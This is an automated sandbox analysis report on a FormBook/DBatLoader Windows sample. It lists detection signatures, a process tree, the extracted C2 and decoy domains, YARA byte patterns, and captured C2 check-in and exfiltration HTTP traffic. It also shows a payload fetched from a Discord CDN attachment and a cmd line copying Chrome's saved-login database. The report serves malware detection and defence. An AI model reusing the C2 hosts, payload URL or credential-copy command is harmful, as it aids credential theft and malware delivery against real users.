
Windows Analysis Report WZ454554.exe

Overview

General Information

Sample Name: WZ454554.exe
Analysis ID: 552851
MD5: 58b39c2620cdda3d3fa6a125f476fc9f
SHA1: 5d2672c79e9dffb2cdeee0d00e406c03c762985c
SHA256: fdf39d043cc55d6a72b1fe01c9067bb7591d5c379798499148521e6158afeea0
Tags: exe, formbook

Detection

FormBook, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected DBatLoader
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • WZ454554.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\WZ454554.exe" MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
    • WZ454554.exe (PID: 6936 cmdline: C:\Users\user\Desktop\WZ454554.exe MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Hyrzbcwcas.exe (PID: 1840 cmdline: "C:\Users\user\Contacts\Hyrzbcwcas.exe" MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
          • Hyrzbcwcas.exe (PID: 5708 cmdline: C:\Users\user\Contacts\Hyrzbcwcas.exe MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
        • Hyrzbcwcas.exe (PID: 7108 cmdline: "C:\Users\user\Contacts\Hyrzbcwcas.exe" MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
          • Hyrzbcwcas.exe (PID: 6340 cmdline: C:\Users\user\Contacts\Hyrzbcwcas.exe MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
        • help.exe (PID: 6656 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 4324 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5628 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • help.exe (PID: 5832 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.spiegelpherese.com/m9g2/"], "decoy": ["pubgnewstatedl.com", "guidedwaveradar.com", "onlineexitpoll.com", "mutationdesign.com", "p60p.com", "xhcaijing.com", "skpcart.store", "houseathomes.com", "thenorthdale.com", "kvkkkararozetleri.com", "formecondominium.com", "7808lll.com", "mitchfletcher.com", "thatsawrapfl.com", "glrinternationalfzco.com", "dbmxkgek.com", "feelingfancy.com", "nishieihuku.com", "newearthhg.com", "tenlog040.xyz", "savche.xyz", "solarofoundation.com", "sk8.network", "schooljoy.net", "ioannismitsialisgerman.online", "hooklinen.com", "gorgeousingems.com", "directusimmigration.com", "nexxt.info", "itecsecure.com", "chairsexpert.com", "yandex-check.online", "ivdripspace.com", "sentlogisticsja.com", "mdk-clothing.com", "quick2repair.net", "thisflippingfamily.com", "lu-dra.xyz", "degenape.art", "evodiocese2022scm.com", "churchofrocknroll.com", "visionaryblock.com", "jornalonlinealagoas.com", "rainbow-of-light.com", "oblical.com", "preserveliqueur.com", "morbidthings.com", "panoramaregency.com", "iphone13promax.review", "gongyingmi.com", "xqzs72.com", "sgmoda.com", "boogiereaper.com", "bitesofwellness.online", "backdad.com", "freeimperia.com", "senerants.tech", "029yu.xyz", "dhakhtar.net", "cnclighting.com", "iplmatchwinner.com", "thpt.space", "naris.net", "hamgirls.com"]}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
WZ454554.exe | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\Contacts\sacwcbzryH.url | Methodology_Shortcut_HotKey | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x58:$hotkey: \x0AHotKey=3
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\Contacts\sacwcbzryH.url | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\Contacts\Hyrzbcwcas.exe | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
00000015.00000000.416006494.0000000000401000.00000020.00020000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x16b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x11a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x17b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x192f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x41c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x78f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x890a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x4819:$sqlite3step: 68 34 1C 7B E1
  • 0x492c:$sqlite3step: 68 34 1C 7B E1
  • 0x4848:$sqlite3text: 68 38 2A 90 C5
  • 0x496d:$sqlite3text: 68 38 2A 90 C5
  • 0x485b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x4983:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000000.323155523.0000000000401000.00000020.00020000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
(86 entries in total; only the first are shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
21.1.Hyrzbcwcas.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
21.1.Hyrzbcwcas.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
21.1.Hyrzbcwcas.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18819:$sqlite3step: 68 34 1C 7B E1
  • 0x1892c:$sqlite3step: 68 34 1C 7B E1
  • 0x18848:$sqlite3text: 68 38 2A 90 C5
  • 0x1896d:$sqlite3text: 68 38 2A 90 C5
  • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
17.2.Hyrzbcwcas.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
17.2.Hyrzbcwcas.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(67 entries in total; only the first are shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (the extracted configuration is reproduced in full under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: WZ454554.exe | Virustotal: Detection: 22%
Source: WZ454554.exe | ReversingLabs: Detection: 39%
Yara detected FormBook
Source: Yara match | File source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe | ReversingLabs: Detection: 39%
Source: 9.2.WZ454554.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.1.Hyrzbcwcas.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 21.1.Hyrzbcwcas.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 21.2.Hyrzbcwcas.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.Hyrzbcwcas.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.1.WZ454554.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: WZ454554.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49751 version: TLS 1.2
                Source: Binary string: wntdll.pdbUGP source: WZ454554.exe, 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, WZ454554.exe, 00000009.00000002.409087872.0000000000BAF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429687044.0000000000B5F000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, help.exe, 00000014.00000002.559731759.00000000031E0000.00000040.00000001.sdmp, help.exe, 00000014.00000002.560116485.00000000032FF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437079630.0000000000980000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000003.420862619.00000000007E0000.00000004.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437691847.0000000000A9F000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.431480106.00000000037E0000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.433718675.00000000038FF000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437536905.00000000033C0000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437717560.00000000034DF000.00000040.00000001.sdmp
                Source: Binary string: cmd.pdbUGP source: Hyrzbcwcas.exe, 00000011.00000002.432784499.0000000000DD0000.00000040.00020000.sdmp, cmd.exe, 00000019.00000000.427671130.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000019.00000002.430750073.0000000000D80000.00000040.00020000.sdmp
                Source: Binary string: wntdll.pdb source: WZ454554.exe, WZ454554.exe, 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, WZ454554.exe, 00000009.00000002.409087872.0000000000BAF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, Hyrzbcwcas.exe, 00000011.00000002.429687044.0000000000B5F000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, help.exe, 00000014.00000002.559731759.00000000031E0000.00000040.00000001.sdmp, help.exe, 00000014.00000002.560116485.00000000032FF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437079630.0000000000980000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000003.420862619.00000000007E0000.00000004.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437691847.0000000000A9F000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.431480106.00000000037E0000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.433718675.00000000038FF000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437536905.00000000033C0000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437717560.00000000034DF000.00000040.00000001.sdmp
                Source: Binary string: help.pdbGCTL source: WZ454554.exe, 00000009.00000002.408113212.0000000000659000.00000004.00000020.sdmp, WZ454554.exe, 00000009.00000002.413836751.0000000002A50000.00000040.00020000.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437020676.0000000000950000.00000040.00020000.sdmp
                Source: Binary string: help.pdb source: WZ454554.exe, 00000009.00000002.408113212.0000000000659000.00000004.00000020.sdmp, WZ454554.exe, 00000009.00000002.413836751.0000000002A50000.00000040.00020000.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437020676.0000000000950000.00000040.00020000.sdmp
                Source: Binary string: cmd.pdb source: Hyrzbcwcas.exe, 00000011.00000002.432784499.0000000000DD0000.00000040.00020000.sdmp, cmd.exe, 00000019.00000000.427671130.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000019.00000002.430750073.0000000000D80000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\WZ454554.exe | Code function: 4x nop then pop esi | 9_2_004172E0
Source: C:\Users\user\Desktop\WZ454554.exe | Code function: 4x nop then pop esi | 9_2_004172F4
Source: C:\Users\user\Desktop\WZ454554.exe | Code function: 4x nop then pop ebx | 9_2_00407B1A
Source: C:\Users\user\Desktop\WZ454554.exe | Code function: 4x nop then pop edi | 9_2_00416CB1
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe | Code function: 4x nop then pop esi | 17_2_004172E0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe | Code function: 4x nop then pop esi | 17_2_004172F4
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe | Code function: 4x nop then pop ebx | 17_2_00407B1A
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe | Code function: 4x nop then pop edi | 17_2_00416CB1

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.sentlogisticsja.com
Source: C:\Windows\explorer.exe | Domain query: www.senerants.tech
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.spiegelpherese.com/m9g2/
Source: global traffic | HTTP traffic detected: GET /m9g2/?xXV=6l9PRhy0D4S&GvW=sz5ErymDSipaI2rGHMiHzQDn8335WrDZWT7fmGUTYuWWeT2KiLBKARdoGEtcQCocu9tS HTTP/1.1 | Host: www.sentlogisticsja.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: POST /m9g2/ HTTP/1.1 | Host: www.sentlogisticsja.com | Connection: close | Content-Length: 409 | Cache-Control: no-cache | Origin: http://www.sentlogisticsja.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.sentlogisticsja.com/m9g2/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw / Data Ascii: [409-byte URL-encoded form body omitted]
Source: global traffic | HTTP traffic detected: POST /m9g2/ HTTP/1.1 | Host: www.sentlogisticsja.com | Connection: close | Content-Length: 149769 | Cache-Control: no-cache | Origin: http://www.sentlogisticsja.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.sentlogisticsja.com/m9g2/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: [URL-encoded form body omitted]
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 13 Jan 2022 19:23:52 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "6192576d-113" | Via: 1.1 google | Connection: close | Data Raw: [hex dump of the HTML body omitted] | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: WZ454554.exe, 00000002.00000003.285422442.0000000000878000.00000004.00000001.sdmp, WZ454554.exe, 00000002.00000003.285452298.0000000000878000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: help.exe, 00000014.00000002.560892253.0000000003929000.00000004.00020000.sdmp | String found in binary or memory: http://www.sentlogisticsja.com
Source: help.exe, 00000014.00000002.560892253.0000000003929000.00000004.00020000.sdmp | String found in binary or memory: http://www.sentlogisticsja.com/m9g2/
                Source: unknownHTTP traffic detected: POST /m9g2/ HTTP/1.1Host: www.sentlogisticsja.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.sentlogisticsja.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sentlogisticsja.com/m9g2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: 
GvW=kR1-1W2IfikqV1W-epHBt3(brUzKU73sUUrZz1UVRtCqaASSvLIUOFQaeBN4MhARsOAN2ZR9rLjvFOeRFjkj2_xADUv_gaUdTdSYGw(EABTtq3saHzZT6rZSG9OonQqhRs~pcR24Wbkyp02u1JKIH2GuImZBEIBtayTFIj3c19DjlriXnER0abHza2JBytYkKjPLfZPt5hyjQG2b2dafoIQeJLYN(qYkGjw5ITLMQoh5MwrNBckrmI4LNl~YnYm4lzXCn78K(6TZI0v2ZtGZpgr-28WjwawhP5lNEoBk6PLxflbI7J8s9-cnQw2SiOdYFw(ELNHuWQE4biMZFwTzRsORsuvJ(zxFMHd74u9ll2OfqDYxKdWQEh0JnBJcipNOx7MA(qABIxvvrIkNlQ).
                Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                Source: global trafficHTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
                Source: global trafficHTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: 97Host: cdn.discordapp.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: 11Host: cdn.discordapp.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: 85Host: cdn.discordapp.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /m9g2/?xXV=6l9PRhy0D4S&GvW=sz5ErymDSipaI2rGHMiHzQDn8335WrDZWT7fmGUTYuWWeT2KiLBKARdoGEtcQCocu9tS HTTP/1.1Host: www.sentlogisticsja.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49751 version: TLS 1.2

                E-Banking Fraud:

                Yara detected FormBook
                Source: Yara matchFile source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORY
